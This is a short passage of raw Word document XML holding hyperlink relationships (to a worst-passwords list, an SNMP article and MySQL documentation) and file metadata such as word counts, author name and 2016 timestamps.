Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Protocol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dev.mysql.com/doc/refman/5.7/en/comments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86D3-3CF5-4AB1-8EE2-2C13F90F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9075</Words>
  <Characters>49010</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>408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Beatriz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Pâmela Beatriz Lins De Souza</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-17T18:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-17T18:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>